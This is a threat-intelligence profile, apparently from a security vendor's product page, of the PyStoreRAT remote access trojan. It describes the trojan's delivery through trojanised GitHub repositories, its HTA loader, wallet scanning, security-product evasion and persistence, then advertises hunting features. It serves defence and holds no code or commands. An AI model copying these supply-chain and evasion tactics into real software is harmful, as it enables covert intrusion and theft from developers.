PyStoreRAT
PyStoreRAT is a previously undocumented, modular, multi-stage Remote Access Trojan/backdoor (JavaScript/HTA-based) delivered via a GitHub supply-chain style campaign. The operation abuses GitHub trust signals by reactivating long-dormant accounts and publishing polished, likely AI-generated repositories masquerading as legitimate utilities (e.g., OSINT tools, security-themed tools, DeFi/crypto bots, GPT/AI wrappers). After the repositories gain traction (including appearing in trending lists and via artificially inflated stars/forks), attackers introduce “maintenance” commits that add a loader/backdoor component.
Infection/execution chain observed in reporting includes Python/JavaScript loader stubs embedded in the repositories that download and execute a remote HTA payload via mshta.exe, leading to PyStoreRAT execution. PyStoreRAT is designed for long-term persistence and data theft, performs extensive system profiling (including admin-privilege checks), and supports a broad plugin/module execution surface: EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules (including in-memory JavaScript execution). It can download and execute additional payloads; a documented follow-on payload is the Rhadamanthys information stealer, used to exfiltrate sensitive information. PyStoreRAT has also been reported to scan for cryptocurrency wallet files (including Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02).
Evasion/adaptation features described include environment checks for specific security products (notably CrowdStrike Falcon and Reason/ReasonLabs, also referenced as CyberReason/ReasonLabs) and altering execution/launch paths when detected. Persistence has been reported via scheduled tasks disguised as NVIDIA application self-updates. Lateral/propagation capability via removable drives (USB) is also described.
Command-and-control is characterized as resilient, using a rotating/circular set of nodes to enable rapid updates and complicate takedowns. Russian-language artifacts/strings in the codebase have been noted, suggesting a possible Eastern European/Russian linkage, but no definitive attribution is provided in the content. Targeting is described as focused on developers as well as IT administrators, cybersecurity professionals/analysts, and OSINT researchers.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
JavaScript-based RAT delivered via GitHub-hosted fake Python repos; uses a small downloader to fetch and execute a remote HTA payload.
Supply-chain delivered JavaScript/HTA backdoor that establishes long-term persistence, profiles infected systems, acts as a multi-purpose loader for additional payloads, performs AV-aware adaptive evasion (e.g., changes execution paths if certain products are detected), and can spread via removable drives.
A fileless remote access trojan (RAT) that leverages fake GitHub repositories to conduct stealthy attacks, primarily targeting developers.
A remote access trojan (RAT) hidden inside utility tools on GitHub, targeting OSINT and cybersecurity researchers. Used to gain unauthorized access and control over compromised systems.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.